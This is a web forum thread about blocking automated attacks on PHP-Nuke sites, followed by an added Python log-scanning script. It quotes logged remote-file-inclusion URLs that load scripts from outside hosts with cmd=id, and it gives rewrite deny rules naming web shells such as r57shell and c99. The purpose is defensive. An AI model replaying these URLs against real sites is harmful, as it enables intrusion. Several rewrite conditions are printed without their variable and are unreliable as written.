Author |
Message |
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
Posted:
Tue Feb 21, 2006 3:55 am |
|
Perhaps some have seen my statement "Probably the most secure version of nuke ever" on my site over at www.code-authors.com and thought I was issuing a challenge.
The following attempts have been tried (for modules which do not exist)
Code:modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudia.100free.com/asc.txt?&cmd=uname%20-a;id
|
Code:/modules/4nAlbum/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id
|
Quote: | /modules/My_eGallery/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id |
Quote: | /modules/My_eGallery/public/displayCategory.php?basepath=http://www.clan-ff.net/vwar/tool25.dat?&cmd=id |
These are quite obviously some sort of automated attack and, needless to say, they didn't work, but what would be the best way to block such attacks? |
|
|
|
djmaze
Subject Matter Expert
Joined: May 15, 2004
Posts: 727
Location: http://tinyurl.com/5z8dmv
|
Posted:
Tue Feb 21, 2006 7:21 am |
|
Code:
# "\=" matches a literal "="; a bare leading "=" makes mod_rewrite do an exact string comparison
RewriteCond %{QUERY_STRING} \=http:// [NC]
RewriteRule ^.*$ - [F]
|
|
|
|
|
Guardian2003
|
Posted:
Tue Feb 21, 2006 7:39 am |
|
Interesting - thanks for that I'll try it and see what develops. |
|
|
|
djmaze
|
Posted:
Tue Feb 21, 2006 8:06 am |
|
here's an even better version that also denies ../../ as seen in rush attacks
for example an exploit in file=../../.htaccess
and another for UNION
# flags take no space after the comma; "\=" and "\." keep "=" and "." literal
RewriteCond %{QUERY_STRING} \=\.\./ [NC,OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC,OR]
RewriteCond %{QUERY_STRING} \=http:// [NC]
RewriteRule ^.*$ - [F]
NOTE: this will NOT make you 100% safe since phpnuke uses register_globals so an attack can also be made thru POST and COOKIE |
|
|
|
Guardian2003
|
Posted:
Tue Feb 21, 2006 8:59 am |
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
Posted:
Tue Feb 21, 2006 9:08 am |
|
admin_styles.php is a known attack that has hit phpBB systems (and those using phpBB derivatives) several times.
Ditto 4nAlbum and My_eGallery using the same displayCategory.php
The attack on index.php is nothing I have seen. Must have been a "cat" variable vulnerable somewhere.
Does Sentinel not block these attacks?
---
For my site not using Sentinel, here's what I have right now.
Using DisError to capture the 404 messages and read the 'REDIRECT_URL'
If it includes anything on 'xmlrpc.php' 'awstats.pl' 'displayCategory.php' 'upgrade_album.php'
They get banned |
|
|
Guardian2003
|
Posted:
Tue Feb 21, 2006 9:52 am |
|
evaders - with the exception of the third quote (above) none tripped Sentinel but that is probably due to my sloppy blocker configuration which I'm looking at right now. |
|
|
|
spasticdonkey
RavenNuke(tm) Development Team
Joined: Dec 02, 2006
Posts: 1693
Location: Texas, USA
|
Posted:
Wed Feb 18, 2009 12:57 am |
|
djmaze wrote: | here's an even better version that also denies ../../ as seen in rush attacks
for example an exploit in file=../../.htaccess
and another for UNION
RewriteCond %{QUERY_STRING} \=\.\./ [NC,OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC,OR]
RewriteCond %{QUERY_STRING} \=http:// [NC]
RewriteRule ^.*$ - [F]
NOTE: this will NOT make you 100% safe since phpnuke uses register_globals so an attack can also be made thru POST and COOKIE |
I know this has come up several times here and there, but a lot of the posts are years old... I wondered if there were some up-to-date recommendations for additional security via htaccess..? I've used these for some time, and my Sentinel emails decreased dramatically after adding..
Code:
RewriteCond %{HTTP_USER_AGENT} ^libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
# the last condition of an [OR] chain carries no [OR]; with one, the rule fires for every request
RewriteCond % THEME_DIR
RewriteRule ^.* - [F,L]
RewriteCond %{QUERY_STRING} .*http:\/\/.*
RewriteRule ^.* - [F]
|
I believe I was told the http one would break some admin functions such as verify downloads and weblinks, but never tried... but it will also stop a lot of cross site scripting attacks...
Just thought I would toss it out there, food for thought. |
|
|
|
evaders99
|
Posted:
Wed Feb 18, 2009 1:09 am |
|
phpNuke does pass http through some functions, mostly redirects. But otherwise, it is good to use |
|
|
|
slackervaara
Worker
Joined: Aug 26, 2007
Posts: 236
|
Posted:
Wed Feb 18, 2009 9:57 pm |
|
I also use this line:
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.* [OR] |
|
|
|
|
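Added example, not posted by anyone in this thread: a small access-log triage script that applies the same three checks discussed above (remote include via `=http://`, `../` traversal, `UNION`) after percent-decoding the query string, so encoded variants such as `http%3A%2F%2F` or `+UNION+` are caught as well. The function names, the combined-log line layout, and the sample lines (documentation IPs, `attacker.example`) are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Same three ideas as the rewrite conditions in the thread, applied to the decoded query.
CHECKS = {
    "remote_include": re.compile(r"=\s*https?://", re.I),
    "path_traversal": re.compile(r"(?:=|/)\.\./"),
    # Requiring SELECT after UNION is an added assumption to cut false positives.
    "sql_union": re.compile(r"\bunion\b[\s\S]*?\bselect\b", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the sorted names of the checks a log line's query string triggers."""
    match = REQUEST_RE.search(log_line)
    if not match or "?" not in match.group(1):
        return []
    query = decode_fully(match.group(1).split("?", 1)[1])
    return sorted(name for name, rx in CHECKS.items() if rx.search(query))

# Constructed sample lines (documentation IPs, placeholder host), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2006:03:50:01 +0000] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/tool25.dat?cmd=id HTTP/1.0" 404 312',
    '192.0.2.11 - - [21/Feb/2006:03:50:02 +0000] "GET /modules.php?name=Foo&url=http%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 200 512',
    '192.0.2.12 - - [21/Feb/2006:03:50:03 +0000] "GET /modules.php?name=Downloads&file=..%2F..%2F.htaccess HTTP/1.1" 200 99',
    '192.0.2.13 - - [21/Feb/2006:03:50:04 +0000] "GET /modules.php?name=News&sid=1+UNION+SELECT+1,2 HTTP/1.1" 200 1',
    '192.0.2.14 - - [21/Feb/2006:03:50:05 +0000] "GET /modules.php?name=News&file=article&sid=42 HTTP/1.1" 200 1',
]

def scan(lines):
    """Map each flagged line's client IP to the checks it triggered."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits.setdefault(line.split(" ", 1)[0], []).extend(found)
    return hits

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, ",".join(names))
```

Access logs only record the request line, so payloads sent via POST bodies or cookies (the register_globals caveat raised in the thread) are not visible to this script.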